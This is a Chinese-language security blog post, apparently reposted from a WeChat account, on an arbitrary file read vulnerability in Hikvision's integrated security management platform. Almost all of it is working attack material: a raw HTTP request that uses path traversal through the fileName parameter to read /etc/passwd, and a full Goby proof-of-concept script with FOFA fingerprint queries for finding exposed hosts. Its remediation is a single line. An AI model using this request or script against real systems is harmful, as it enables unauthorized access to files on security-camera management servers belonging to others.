上一篇
海康综合安防管理平台任意文件读取漏洞
- 信息安全
- 2024-06-04
- 1130
漏洞描述
漏洞复现
漏洞URL:/center/api/task/..;/orgManage/v1/orgs/download
漏洞参数:fileName
漏洞详情:
1、打开自己的服务
2、使用以下数据包进行访问
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Te: trailers
Connection: close
3、漏洞检测存在
goby检测规则脚本:
package exploits
import (
"git.gobies.org/goby/goscanner/goutils"
)
func init() {
expJson := `{
"Name": "海康综合管理平台 readfile",
"Description": "",
"Product": "",
"Homepage": "",
"DisclosureDate": "2024-05-31",
"PostTime": "2024-05-31",
"Author": "1589315990@qq.com",
"FofaQuery": "title=\"综合安防管理平台\"",
"GobyQuery": "title=\"综合安防管理平台\"",
"Level": "3",
"Impact": "",
"Recommendation": "",
"References": [],
"Is0day": false,
"HasExp": false,
"ExpParams": [],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd",
"follow_redirect": true,
"header": {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36",
"Accept-Encoding": "gzip, deflate",
"Accept": "*/*",
"Connection": "keep-alive"
},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "root:",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": []
}
],
"Tags": [],
"VulType": [],
"CVEIDs": [
""
],
"CVSSScore": "",
"Translation": {
"CN": {
"Name": "海康综合管理平台 readfile",
"Product": "",
"Description": "",
"Recommendation": "",
"Impact": "",
"VulType": [],
"Tags": []
},
"EN": {
"Name": "海康综合管理平台 readfile",
"Product": "",
"Description": "",
"Recommendation": "",
"Impact": "",
"VulType": [],
"Tags": []
}
},
"PocGlobalParams": {},
"ExpGlobalParams": {}
}`
ExpManager.AddExploit(NewExploit(
goutils.GetFileName(),
expJson,
nil,
nil,
))
}
修复建议
升级至安全版本。
转自小羊安全屋(wx:gh_431c125001cd)https://mp.weixin.qq.com/s/s_mdbvrX8e25sD19CNNkhg